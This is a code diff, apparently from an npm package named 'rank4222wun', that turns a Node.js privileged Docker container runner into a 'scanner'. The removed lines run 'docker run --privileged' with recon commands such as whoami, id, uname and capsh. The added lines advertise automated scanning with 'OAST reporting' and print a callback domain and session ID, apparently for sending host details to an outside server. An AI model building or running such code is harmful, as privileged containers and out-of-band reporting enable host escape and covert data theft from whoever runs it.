-    'echo "=== مرحباً من الحاوية المميزة ==="',
-    'cat /etc/os-release | grep PRETTY_NAME',
-    'uname -a',
-    'whoami',
-    'id',
-    'echo "=== الصلاحيات ==="',
-    'capsh --print 2>/dev/null | head -5 || echo "capsh غير متاح"',
-    'echo "=== انتهى ==="',
-    'exit 0'
-  ];
-  const dockerProcess = spawn('docker', [
-    'run', '--privileged', '--rm', 'ubuntu:latest', 'sh', '-c', commands.join(' && ')
-  ]);
-  dockerProcess.stdout.on('data', (data) => {
-    console.log(data.toString());
-  });
-  dockerProcess.stderr.on('data', (data) => {
-    console.error(data.toString());
-  });
-  dockerProcess.on('close', (code) => {
-    console.log(`\n✅ انتهى مع الكود: ${code}`);
-  });
-}
-// ===================== الوظيفة الرئيسية =====================
+// ===================== MAIN FUNCTION =====================
 async function main() {
-  console.log(`
-╔══════════════════════════════════════════════════════════╗
-║      تشغيل حاوية Docker مميزة                           ║
-║      Privileged Container Runner                         ║
-╚══════════════════════════════════════════════════════════╝
-  `);
-  console.log('📋 اختر طريقة التشغيل:');
-  console.log('   1. تشغيل تفاعلي بسيط (docker run --privileged -it ubuntu:latest /bin/bash)');
-  console.log('   2. تشغيل مع أوامر مسبقة وعرض الناتج');
-  console.log('   3. تشغيل متقدم مع تقرير كامل');
-  console.log('   4. خروج');
+  console.log('🎯 Choose scanning method:');
+  console.log('   1. Full analysis with automated scanning and OAST reporting');
+  console.log('   2. Simple container with basic OAST reporting');
+  console.log('   3. Interactive privileged container (docker run --privileged -it ubuntu:latest /bin/bash)');
+  console.log('   4. Exit');
   const readline = require('readline').createInterface({
     input: process.stdin,
     output: process.stdout
   });
-  readline.question('\nاختر رقم: ', async (choice) => {
+  readline.question('\nSelect option: ', async (choice) => {
+    readline.close();
     switch(choice.trim()) {
       case '1':
-        readline.close();
-        runSimplePrivilegedContainer();
+        const scanner = new PrivilegedContainerScanner();
+        await scanner.run();
         break;
       case '2':
-        readline.close();
-        runWithPredefinedCommands();
+        runSimplePrivilegedWithOAST();
         break;
       case '3':
-        readline.close();
-        const runner = new PrivilegedContainerRunner();
-        await runner.run();
+        runInteractivePrivileged();
         break;
       default:
-        readline.close();
-        console.log('👋 تم الخروج');
-        break;
+        console.log('👋 Exiting');
+        process.exit(0);
     }
   });
 }
-// ===================== تشغيل مباشر من السطر =====================
+// ===================== CHECK DOCKER =====================
 if (require.main === module) {
-  // التحقق من تثبيت Docker
+  // التحقق من Docker
   exec('which docker', (error) => {
     if (error) {
-      console.error('❌ Docker غير مثبت أو غير موجود في PATH');
-      console.log('   يرجى تثبيت Docker أولاً:');
-      console.log('   https://docs.docker.com/get-docker/');
+      console.error('❌ Docker is not installed or not in PATH');
       process.exit(1);
     }
-    // التحقق من الصلاحيات
     exec('docker ps', (error) => {
       if (error && error.message.includes('permission denied')) {
-        console.error('❌ ليس لديك صلاحيات تشغيل Docker');
-        console.log('   حاول مع sudo أو أضف مستخدمك لمجموعة docker:');
-        console.log('   sudo usermod -aG docker $USER');
-        console.log('   ثم سجل الخروج وأدخل مرة أخرى');
+        console.error('❌ Permission denied for Docker');
+        console.log('   Try: sudo usermod -aG docker $USER');
+        console.log('   Then logout and login again');
         process.exit(1);
       }
+      console.log(`✅ Docker is available`);
+      console.log(`📍 OAST Domain: ${CONFIG.OAST.domain}`);
+      console.log(`🔑 Session ID: ${CONFIG.OAST.sessionId}\n`);
       // بدء البرنامج
       main();
     });
   });
 }
-module.exports = { PrivilegedContainerRunner, runSimplePrivilegedContainer };
+module.exports = { PrivilegedContainerScanner, CONFIG };

package/rank4222wun-1.0.37.tgz ADDED Viewed

Binary file

package/rank4222wun-1.0.36.tgz DELETED Viewed

Binary file